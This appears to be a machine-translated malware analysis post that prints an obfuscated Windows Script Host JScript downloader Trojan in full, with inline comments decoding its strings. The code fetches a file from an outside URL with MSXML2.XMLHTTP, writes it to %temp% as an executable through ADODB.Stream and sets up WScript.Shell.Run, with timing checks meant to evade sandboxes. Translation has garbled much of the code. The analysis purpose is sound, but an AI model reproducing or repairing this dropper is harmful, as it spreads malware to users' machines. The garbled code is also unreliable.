After sample analysis and crawl, this malicious program is a download Trojan horse.
Can not understand Baidu encyclopedia.
Http://baike.baidu.com/link?url=0dNqFM8QIjEQhD71ofElH0wHGktIQ3sMxer47B4z_54LSHixZYLcNWDgisJAeMRN5yJKjMu3znZc_sMh43cuwK
var ukczjmztw = "F"; var Vljbzijbrdixir = "SD"; var mzhidfbvgtzwl = "Uhi"; var xrxesgiwq = "Ya"; var stgtoceaugs = "F"; var Mcc Q = "GSD"; var yvfrnfkc = "a7o"; var Zokyxgifsuosdin = "d8f"; var rysgoqrkj = "HgS"; var fajepxv = "7"; var LzK = "U"; var wnkgg Byjhbgayk = "DFA"; var rqjm = "S"; var tcbpcsvm = "O"; var Glyiongtmo = "a"; var Cmleb = "Fkj"; var gumapaymgfr = "; l"; var AWOs Zjal = "D"; var rrruwakbvmdht = "S"; var qcfk = "a"; asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf//---------------------------------var wxgm = "F"; var WME = "SD"; var wyl = "HI"; var dgxr = "Yau"; var ofbjpavgdudsr = "SDF"; var akaujbxv = "G"; var Ywynebktcar = "a7o"; var umknxpoxkvv = "8f"; var jruthqojc Xz = "D"; var vmrauxwtpkwlzbj = "HgS"; var hnakwb = "Au7"; var Kurwvoq = "F"; var oxjw = "D"; var Wsagyfatjpu = "AOS"; var UdT = "J"; var wgkyturmi = "K"; var fwsau = "; lf"; var ussmxvh = "D"; var Xruulsujwzczein = "as";//asd;lfkjaosdfau7hgsd8fa7ogsdfyau hisdf////---------------------------------var fvjysepitgsz = "F"; var mjlm = "SD"; var ohdtwuswyldnd = "Hi"; var Nfkohhanka = "Au"; var pajlp = "FY"; var xteqe = "D"; var Wolngrckpnji = "S"; var Ctd0 = "og"; var ngjpec = "A7"; va R JOHMRZHTBT = "F"; var rwrr = "D8"; var xhuyvlxntg = "GS"; var aofesd = "7h"; var iartkeg = "FAU"; var UICUSNVVRYPV = "OSD"; VA R SQXTHDCTAOOEFV = "Ja"; var ksxja = "K"; var azmzqadlr = "; lf"; var ofzc = "SD"; var UFs = "a";//ASD;LFKJAOSDFAU7HGSD8FA7OGSD fyauhisdf//-----------------------------------var WiM = "ose", var cdzfn = "L", var gtvoeyzrpmbky = "C";//close ();//----- ------------------------------var fkqycugsvdkek = "E"; var yldfonqslg = "Fil"; var kegv = "O"; var reweueffsfzcc = "VeT"; var Mcxydwkmdtez = "Sa";//savetofile ();//-----------------------------------var orfcagixftilpy = "on"; var AnB = "Iti"; var Oeudh = "POS";//position//-----------------------------------var bxwfuyaplk = "E"; var Zhbiendjhvi = "T"; var omwnrbis = "W Ri ";//write ()//-----------------------------------var ionaxhdnbsjshyl =" E "; var Svvps =" Typ ";//type//-------------- ---------------------var rxdykd = "Nvar ftsb = "Ope";//open//-----------------------------------var zzoo = "AM"; var tscsrkwikqy = "Tre"; var aifn = "B.s"; var Zbasfumik = "D"; var uwddgxvozcug = "O"; var musaovh = "D"; var Yzvowlzlpfausz = "A";//"ADODB.stream"//--------------------- --------------var pngkr = "ct", var iqpsquxjgp = "Je", var btjnufjw = "B"; var Liexl = "TeO"; var kzbj = "Rea"; var derqhnng = "C";//creatobject ("ADODB.stream") var litxpjamhxaguq = "4h4"; var wwzpwldmx = "6n"; var CuF0 = "k6j"; var ouhbkseqhf = "0"; VA R LQP = "hu/"; var rquoidonsf = "L."; var njkvurbzu = "Ta", var csyccmfj = "Por", var xctxpkvh = "Egy"; var auuclqfydbnsn = "J"; var Ltxzk = "ev"; var Mpaarovfxvesej = ". N"; var nvjesnhzihjx = "www"; var jfdhyk = "://"; var cfpmrsibsmp = "P"; var RKP = "Htt";//http://www.nevjegyportal.hu/ok 6j6n4h4//-----------------------------------var ubtufbihbmz = "T"; var lwkk = "GE";//Get//--------------------------- --------var krpxn = "Pen"; var Hrntkpoubmya = "O";//open//-----------------------------------var ofdmpjoyw = "E"; VAR nlpqqu = "x", var CZPODXEYVQRFB = "7.e", var clfbaiuobq = "PO", var xmxyenhbtwhg = "M1"; var dqzegam = "Ko"; var ckougmrgjte = "SE"; var qasyj = "Ky";//kysekom1po7.exe//-----------------------------------var eqycevqquazi = "%/"; var TNGKCALXXEPJMF = "P"; var mnyqbv = "M"; var Frwlczopjcmjvoe = "E"; var kynfxzksc = "%T";//%temp%///------------------------- ----------var ajbjrfwcho = "GS"; var ryw = "in"; var lvlachwja = "Str"; var Ngjuy = "T"; var zxmail = "n"; var Xlaapawdhgaz = " E "; var lrtf =" M "; var EGXWFANKP =" Ron "; var ucopd =" Vi "; var xzqvowinmg =" n "; var nlgbspqidlaij =" NdE "; var gyo =" Xpa "; VA R gpyeolnn = "E";//expendenvironmentstrings//-----------------------------------var kpsxpufdrzihigv = "TP"; var VGOFGZZDOVH = "T"; var Wjoaasugz = "LH"; var Bphwmdys = "XM"; var awpqzn = "2."; var rnvidtrapbbfho = "XML"; var Ynxoqhqdiqydxve = "MS";//msxml2.xmlhttp//-----------------------------------var Zkemzwunlwomdud = "n", var ovqabstejwqkg = "Ru", var WKRVEZGFPAMCAC = "ell"; var aojg = "H"; var hdveufs = "S";var Pgitzpyn = "."; var Itvqhxcrebdudt = "T", var wxgwfqyhw = "Rip", var KDSFP = "C"; var nzv = "WS";//wscript.shell.run ()//--------------------- --------------var nffhujlofwsus = "ct"; var kvzbovovglseg = "Je"; var DXP = "B"; var zjrmzjunjfuys = "O"; var ecdmpfvaxg = "E" var stma = "at"; var knalphmovixz = "Cre";//createobject ()//-----------------------------------var ACTC = new Date (); var SZT0 = Actc.getmilliseconds (); Wscript.Sleep, var actc = new Date (), var brdtypaqicd = Actc.getmilliseconds (); Wscript.Sleep, var actc = new Date (), var VrU = Actc.getmilliseconds (); Wscript.Sleep, var actc = new Date (), var deywdl = Actc.getmilliseconds ();//var Ndnaj = Brdtypaqicd-szt0;//var NdNAj=n EW date (). Getmilliseconds ()-new date (). Getmilliseconds ()////10svar hrormjj = vru-brdtypaqicd;//10svar YSc0 = DE ywdl-vru;//10sWshShell = wscript[knalphmovixz + stma + ecdmpfvaxg + zjrmzjunjfuys + DXP + kvzbovovglseg + NFFHUJLOFW SUs] (nzv + KDSFP + wxgwfqyhw + Itvqhxcrebdudt + Pgitzpyn + hdveufs + AOJG + WKRVEZGFPAMCAC);//wshshell=wscript[createobject] (Wscript.shell.run); function Jmljvnfwjsplh (NLN) {wshshell[ ovqabstejwqkg + Zkemzwunlwomdud] (nln, 0, 0);} function Jmljvnfwjsplh (NLN)//{//Wshshell[run] (nln,0,0);//}function OCEOSFHPWS (n) {return Ynxoqhqdiqydxve + Rnvidtrapbbfho + awpqzn + bphwmdys + Wjoaasugz + VGOFGZZDOVH + KPSXPUFDRZIHIGV;} function OCEOSFHPWS (n)//{//return msxml2.xmlhttp;//}if ((Ndnaj! = HRORMJJ) | | (HRORMJJ! = YSc0)) {FOIKDMMZWKAUGLW = Wshshell[gpyeolnn + gyo + nlgbspqidlaij + xzqvowinmg + ucopd + EGXWFANKP + lrtf + XLaaPawDhGaz + ZXMail + Ngjuy + lvlachwja + ryw + Ajbjrfwcho] (KYNFXZKSC + Frwlczopjcmjvoe + MNYQBV + TNGKCALXXEPJMF + Eqycevqquazi) + QasyJ + C Kougmrgjte + Dqzegam + xmxyenhbtwhg + clfbaiuobq + CZPODXEYVQRFB + nlpqqu + ofdmpjoyw;//foikdmmzwkauglw=/%temp%/Path//Wsh Shell[expendedenvironmentstrings] (%temp%); EFASPQJ = OCEOSFHPWS (0),//var xmlhttp=new activeobject ("Microsoft.XMLHTTP"); WMRQFSRLJDPWT = WScript.CreateObject ( EFASPQJ);////xmlhttp ObjeCt//[hrntkpoubmya + krpxn]==open Wmrqfsrljdpwt[hrntkpoubmya + KRPXN] (Lwkk + ubtufbihbmz, RKP + CFpmRSiBsMp + JFDhyk + NVJESNHZIHJX + Mpaarovfxvesej + ltxzk + auuclqfydbnsn + XCTXPKVH + csyccmfj + njkvurbzu + rquoidonsf + LQP + OUHbKSEqhF + CuF0 + wwzpwldmx + Litxpjamhxaguq, false);//WMRQFSRLJDPWT (get,http://www.nevjegyportal.hu/ok6j6n4h4,false);// Xmlhttp.open ("Get", "url", false); Wmrqfsrljdpwt.send (); while (Wmrqfsrljdpwt.readystate < 4) {Wscript.Sleep (1000) };//readystateelchu = wscript[knalphmovixz + stma + ecdmpfvaxg + zjrmzjunjfuys + DXP + kvzbovovglseg + NFFhujLOFwsUs] (YZVO Wlzlpfausz + MUSAOVH + uwddgxvozcug + zbasfumik + AIFN + tscsrkwikqy + zzoo);//var adostream=createobject ("ADODB.stream"); Elchu[hrntkpoubmya + KRPXN] ();//adostream.open (); Elchu[svvps + ionaxhdnbsjshyl] = 1;//adostream.type=1;elchu[ Omwnrbis + Zhbiendjhvi + bxwfuyaplk] (wmrqfsrljdpwt.responsebody);//adostream.write (wmrqfsrljdpwt.responsebody); Elchu[oeudh + AnB + orfcagixftilpy] = 0;//ADOSTREAM.POSITION=0;ELCHu[mcxydwkmdtez + reweueffsfzcc + KEGV + YLDFONQSLG + Fkqycugsvdkek] (FOIKDMMZWKAUGLW, 2);//adostream.savetofile (/%temp %/,2); Elchu[gtvoeyzrpmbky + CDZFN + WiM] ();//adostream.close ();//JMLJVNFWJSPLH ("/%temp%/");//wshshell[run] (NLN,0,0 ) Ndnaj = "ASD;LFKJAOSDFAU7HGSD8FA7OGSDFYAUHISDF" + new Date (). Getmilliseconds () + new Date (). Getmilliseconds (); /10SHRORMJJ = "ASD;LFKJAOSDFAU7HGSD8FA7OGSDFYAUHISDF" + VrU + brdtypaqicd;//new date (). Getmilliseconds ()-New date (). Getmilliseconds () = "ASD;LFKJAOSDFAU7HGSD8FA7OGSDFYAUHISDF" + new Date (). Getmilliseconds () + new Date (). Getmilliseconds ();//10sysc0 = "ASD;LFKJAOSDFAU7HGSD8FA7OGSDFYAUHISDF" + DEYWDL + vru;//10s}
Windows native script script malicious Code Analysis (annotated)